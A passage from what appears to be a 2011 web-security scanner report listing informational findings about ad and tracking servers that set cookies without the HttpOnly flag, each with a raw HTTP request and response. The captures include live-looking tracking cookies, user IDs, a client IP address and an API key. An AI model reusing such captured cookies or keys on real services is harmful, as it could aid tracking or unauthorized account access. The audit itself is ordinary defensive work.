GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313433976**;10,3,183;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26page.allowcompete%3Dyes_@26tile%3D1313434014105_@26page.allowcompete%3Dyes_@26domId%3D67962?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4e3acdbfe6377; i_1=33:1411:1209:100:0:52753:1312480942:L|33:353:1217:141:0:48529:1312477954:B2|33:1411:1163:100:0:48526:1312477092:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Aug 2011 18:47:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=25:1715:1137:106:0:53518:1313434067:L|25:1715:1138:106:0:53518:1313433994:L|33:1411:1209:100:0:52753:1312480942:L; expires=Thu, 15-Sep-2011 18:47:47 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 949

   function wsod_image1715() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598
...[SNIP]...

8.11. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1020322&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/display.html?cl=ca-aj-cat&ch=&ty=image%2Cflash&size=300x250&kw=&hints=&target=/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1313432642380?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=a7c32506-b45f-11e0-8415-78e7d15f4cbc&_hmacv=1&_salt=1801099763&_keyid=k1&_hmac=da3cebb34c3bfe9786a2f81233b23fded95d641a; ih="b!!!!(!*<[_!!!!#=/Xr]!*<[e!!!!#=/Xr3!->h]!!!!#=0UgC!2e3%!!!!#=0V9F!3X7u!!!!#=/XrM"; bh="b!!!!D!!-?2!!!!#=/Xr,!!4e4!!!!#=/Xr.!!J>P!!!!#=0?S^!!S.q!!!!'=0`rl!!v4-!!!!#=/f,V!#%m8!!!!#=/f,V!#3,2!!!!#=01B%!#3LI!!!!#=01B%!#5m%!!!!#=0?S^!#6A+!!!!#=0?S^!#?dj!!!!%=/(S1!#?dk!!!!%=/(S1!#Qu0!!!!%=0`/r!#Sw^!!!!#=/(R/!#]%`!!!!#=/Xqt!#^d6!!!!#=/Xqt!#aO=!!!!#=.l#l!#c3y!!!!#=01B%!#m,8!!!!#=.pLS!#v?X!!!!$=/(S1!#v?_!!!!#=/(R7!#v?a!!!!#=/(S1!#xZB!!!!#=0?S^!$)7'!!!!#=01B%!$1]+!!!!#=/Xr,!$1g/!!!!#=0U==!$2iP!!!!#=0U=>!$7.'!!!!#=-=-=!$8Js!!!!#=/(R/!$8Ju!!!!#=/(R/!$8L-!!!!#=/f,V!$8L.!!!!#=/f,V"; BX=2h1vh6572dqmi&b=4&s=p2&t=219

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:24:11 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!!E!!-?2!!!!#=/Xr,!!4e4!!!!#=/Xr.!!J>P!!!!#=0?S^!!S.q!!!!'=0`rl!!v4-!!!!#=/f,V!#%m8!!!!#=/f,V!#3,2!!!!#=01B%!#3LI!!!!#=01B%!#5m%!!!!#=0?S^!#6A+!!!!#=0?S^!#?dj!!!!%=/(S1!#?dk!!!!%=/(S1!#Qu0!!!!%=0`/r!#Sw^!!!!#=/(R/!#]%`!!!!#=/Xqt!#]5h!!!!$=0`xl!#^d6!!!!#=/Xqt!#aO=!!!!#=.l#l!#c3y!!!!#=01B%!#m,8!!!!#=.pLS!#v?X!!!!$=/(S1!#v?_!!!!#=/(R7!#v?a!!!!#=/(S1!#xZB!!!!#=0?S^!$)7'!!!!#=01B%!$1]+!!!!#=/Xr,!$1g/!!!!#=0U==!$2iP!!!!#=0U=>!$7.'!!!!#=-=-=!$8Js!!!!#=/(R/!$8Ju!!!!#=/(R/!$8L-!!!!#=/f,V!$8L.!!!!#=/f,V"; path=/; expires=Wed, 14-Aug-2013 18:24:11 GMT
Set-Cookie: BX=2h1vh6572dqmi&b=4&s=p2&t=219; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 15 Aug 2011 18:24:11 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

8.12. http://ads.cnn.com/js.ng/site=cnn&cnn_pagetype=main&cnn_position=BG_Skin&cnn_rollup=homepage&page.allowcompete=no&tile=0392593343131&transactionID=1604588547342336  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /js.ng/site=cnn&cnn_pagetype=main&cnn_position=BG_Skin&cnn_rollup=homepage&page.allowcompete=no&tile=0392593343131&transactionID=1604588547342336

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=cnn&cnn_pagetype=main&cnn_position=BG_Skin&cnn_rollup=homepage&page.allowcompete=no&tile=0392593343131&transactionID=1604588547342336 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:44:58 GMT
Server: Apache
Set-Cookie: NGUserID=aa55a22-30407-167278533-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:44:58 GMT
Pragma: no-cache
Content-Length: 166
Content-Type: application/x-javascript

document.write('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\n<html>\n<body style=\"margin: 0px;\">\n<!--FlightID: 4621-->\n\n</body>\n</html>');

8.13. http://ak1.abmr.net/is/www.att.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/www.att.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www.att.com?U=/global/images/priceLine_bg.gif&V=3-4L8s0Rm6Q3C9AuOk1gdnIv8A2PQHwaOlZ+ok8dvw%2fyHRXeIxaMGF7g%3d%3d&I=00E0DB608ED9193&D=www.att.com&01AD=1& HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: ak1.abmr.net

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.att.com/global/images/priceLine_bg.gif?01AD=3y_FhavpLpy0Az7sa5s6EJ9FWcy5KENbn9flUOSJPda06wv7fmLyN_A&01RI=00E0DB608ED9193&01NA=
Expires: Mon, 15 Aug 2011 18:19:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:19:20 GMT
Connection: close
Set-Cookie: 01AI=2-2-066CB173E87CE55F4A7D8859E3AF1B0C744E837B34AF7545AF28FE3877F0B64C-CB58ADF9AF091C2673E5D034B67A2C7B22A03B632F8D982C20B7A8EBA016C3DC; expires=Tue, 14-Aug-2012 18:19:20 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


8.14. http://ak1.abmr.net/is/www.wireless.att.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/www.wireless.att.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www.wireless.att.com?U=/cell-phone-service/images/cart/en/assist_btn.gif&V=3-vko07ILw2X5GtumyuJBCSq9+YoFG+Rcn%2f92JwFgUEu4Oy7XTW5aa+hrmm5nqZoOY&I=BDE9DFECD72EBA9&D=www.wireless.att.com&01AD=1& HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Cookie: 01AI=2-2-EE34781477D09535AD10FF387FAAC647F572C92C23BB2D281248A426FB62A53C-4BCF4F156599E84DD0BD0C1E4CD6DA0DEB619F5B7B49B0CF680C44FCAD428460
Host: ak1.abmr.net

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.wireless.att.com/cell-phone-service/images/cart/en/assist_btn.gif?01AD=3yRGJWB5wDwjSCxjAiWkDg3saGZHj23T0uqcL5pHKEpNKTwsCmCB6Aw&01RI=BDE9DFECD72EBA9&01NA=
Expires: Mon, 15 Aug 2011 18:19:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:19:25 GMT
Connection: close
Set-Cookie: 01AI=2-2-8F6A296E59A0DC0173107E351BC754196A50B7453B506E30FCDC3A4C6F1ED425-376E9706C426CA4C4A57EF5C0F4A2583A17E3630446C70C6BFFAE04962ED14B7; expires=Tue, 14-Aug-2012 18:19:25 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


8.15. http://akamai.mathtag.com/sync/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://akamai.mathtag.com
Path:   /sync/img

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sync/img?mt_exid=10001&mt_exuid=A3106A1EF9078DAF348E74F1ECE0A7D9&rurl=4-XRXEfsHUjX79wpr90WUBHEpPFgFZ7K8LqRetMfIhMPc9HdQnCfLMr1PUFryk8nm6SGOR7Ob3F8bi38OgGeVIjYtli7qcgnMsfT+MDqksz5VSZPlHpmzEqOFjqv75w90mVwh6lHmr6mVQ49yZctOABIVbSoBQHAVVe8rvkPpfTyXBC88XF4vO1Q%3d%3d&V=3-GE6Oh0szcH0kdxBPAshRP%2frLcgS+eCOCZ8%2fTha0kfdlxBGza5HIZghKje7Yu%2fQgd HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: akamai.mathtag.com

Response

HTTP/1.1 302 Moved Temporarily
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x2 pid 0x6806 26630
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 43
Expires: Mon, 15 Aug 2011 18:20:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:42 GMT
Connection: close
Set-Cookie: uuid=4e49637a-3b74-e247-fea7-4b3e66b6d71b; domain=.mathtag.com; path=/; expires=Tue, 14-Aug-2012 18:20:42 GMT
Set-Cookie: ts=1313432442; domain=.mathtag.com; path=/; expires=Tue, 14-Aug-2012 18:20:42 GMT
Set-Cookie: mt_mop=10001:1313432442; domain=.mathtag.com; path=/; expires=Tue, 14-Aug-2012 18:20:42 GMT
Location: http://www.wireless.att.com/store_maintenance/images/page_midSlice.gif?01RI=1946BF68A41E07A&01CM=cm:akamai.mathtag.com&01NA=ck&

GIF89a.............!.......,...........D..;

8.16. http://api.bizographics.com/v1/profile.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.json?&callback=cnnad_bizo_load_ad_callback&api_key=vuy5aqx2hg8yv997yw9e5jr4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KX2vDEYkjj68aj5XcunNcMDa7Re6IGD4lLWOSE2iimqa3Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtR5QpvePKBw6ArykBishtoVkEVUJBxdqAyD3lFIcLMteW4iiqSbERYipuWHxYXQtZCS6EipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Mon, 15 Aug 2011 18:45:36 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KWmlUlSisdmOxaj5XcunNcMDa7Re6IGD4lDIPfXzsFKUaAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQiizxJ8nJqAy5KisYO67RyvfEVUJBxdqAyCVVGcnipFb1ARYpCNxiiJkJBmAxhisg5kK3YipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 176
Connection: keep-alive

cnnad_bizo_load_ad_callback({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

8.17. http://ar.voicefive.com/b/recruitBeacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/recruitBeacon.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/recruitBeacon.pli?pid=p107223597&PRAd=6003&AR_C=603 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/?l=1142910522&sz=300x250&wr=h&t=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p97174789=exp=1&initExp=Mon Aug 8 01:36:31 2011&recExp=Mon Aug 8 01:36:31 2011&prad=314453502&arc=210323181&; ar_p45555483=exp=1&initExp=Sun Aug 14 22:53:19 2011&recExp=Sun Aug 14 22:53:19 2011&prad=65427569&arc=36060045&; UID=1dc84e78-80.67.74.137-1312767393

Response

HTTP/1.1 302 Redirect
Server: nginx
Date: Mon, 15 Aug 2011 18:26:36 GMT
Content-Type: text/plain
Connection: close
Set-Cookie: BMX_BR=pid=p107223597&prad=6003&arc=603&exp=1313432796; expires=Tue 16-Aug-2011 18:26:36 GMT; path=/; domain=.voicefive.com;
Set-Cookie: ar_p107223597=exp=2&initExp=Mon Aug 15 18:25:22 2011&recExp=Mon Aug 15 18:26:36 2011&prad=6003&arc=603&; expires=Sun 13-Nov-2011 18:26:36 GMT; path=/; domain=.voicefive.com;
Location: http://b.voicefive.com/p?c1=4&c2=p107223597&c3=6003&c4=603&c5=&c6=2&c7=Mon%20Aug%2015%2018%3A25%3A22%202011&c8=&c9=&c10=&c15=&rn=1313432796
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent
Content-Length: 0


8.18. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6034961&rn=0.26338764396496117&c7=http%3A%2F%2Fwww.imdb.com%2F&c3=&c4=http%253A%252F%252Fwww.imdb.com%252F&c5=&c6=&c10=&c15=&c16=&c8=The%20Internet%20Movie%20Database%20(IMDb)&c9=&cv=1.7 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=33d3453a-80.67.74.137-1310656935

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 15 Aug 2011 18:24:02 GMT
Connection: close
Set-Cookie: UID=33d3453a-80.67.74.137-1310656935; expires=Wed, 14-Aug-2013 18:24:02 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


8.19. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/?l=1142910522&sz=300x250&wr=h&t=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=33d3453a-80.67.74.137-1310656935

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 15 Aug 2011 18:26:37 GMT
Connection: close
Set-Cookie: UID=33d3453a-80.67.74.137-1310656935; expires=Wed, 14-Aug-2013 18:26:37 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

8.20. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035748&d.c=gif&d.o=cnn-adbp-domestic&d.x=110892361&d.t=page&d.u=http%3A%2F%2Fwww.cnn.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=33d3453a-80.67.74.137-1310656935

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 15 Aug 2011 18:45:09 GMT
Connection: close
Set-Cookie: UID=33d3453a-80.67.74.137-1310656935; expires=Wed, 14-Aug-2013 18:45:09 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

8.21. http://b.voicefive.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=4&c2=p107223597&c3=6003&c4=603&c5=&c6=1&c7=Mon%20Aug%2015%2018%3A25%3A22%202011&c8=&c9=&c10=&c15=&rn=1313432722 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/?l=1142910522&sz=300x250&wr=h&t=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p97174789=exp=1&initExp=Mon Aug 8 01:36:31 2011&recExp=Mon Aug 8 01:36:31 2011&prad=314453502&arc=210323181&; ar_p45555483=exp=1&initExp=Sun Aug 14 22:53:19 2011&recExp=Sun Aug 14 22:53:19 2011&prad=65427569&arc=36060045&; UID=1dc84e78-80.67.74.137-1312767393; BMX_BR=pid=p107223597&prad=6003&arc=603&exp=1313432722; ar_p107223597=exp=1&initExp=Mon Aug 15 18:25:22 2011&recExp=Mon Aug 15 18:25:22 2011&prad=6003&arc=603&

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 15 Aug 2011 18:26:36 GMT
Connection: close
Set-Cookie: UID=1dc84e78-80.67.74.137-1312767393; expires=Wed, 14-Aug-2013 18:26:36 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

8.22. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://banners.adultfriendfinder.com
Path:   /go/page/iframe_cm_26358

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/page/iframe_cm_26358?dcb=sexfinder.com&pid=p1935206.submad_70975_1_s5232&madirect=http://medleyads.com/spot/c/1313434697/1376046894/10664.html HTTP/1.1
Host: banners.adultfriendfinder.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:52 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,IPDnYK9LPElKtOp23iKt5ZzHGR0dtCKllPHqgsvcj13fvkskx4bbQm6F66eDPa410PU86fLd7lbFcIw26rWp9pjKfhvAZsbS2AIta07UzdIhBLLebh/pcIK3wr/3oE8b39ayFOf7NFF/h_LYDH4RXZke/zyv/4Sk5cy5VpAJ9mHO3/Utt0cMZnVylsjqLZD3; path=/; domain=.adultfriendfinder.com
Set-Cookie: v_hash=_english_13029; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
